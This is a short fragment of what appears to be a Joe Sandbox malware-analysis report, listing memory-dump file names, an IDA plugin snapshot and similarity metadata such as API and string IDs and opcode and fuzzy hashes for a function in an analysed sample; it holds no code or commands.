                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Temp$FileNamePath
                                              • String ID: aut
                                              • API String ID: 3285503233-3010740371
                                              • Opcode ID: 2eb8a8068512ae1ba7713d527782926618e36e9f1038762268d0b8af3cfd14ad
                                              • Instruction ID: 915271614cc5d006d6ed8c55fa79c1a993cdef644b0e0f17f0f987e0763cab5e
                                              • Opcode Fuzzy Hash: 2eb8a8068512ae1ba7713d527782926618e36e9f1038762268d0b8af3cfd14ad
                                              • Instruction Fuzzy Hash: 96D05E7654030DABDB50ABD0DC0EFDBBB7CDB08700F0042A1BE58961A2DE7055948B91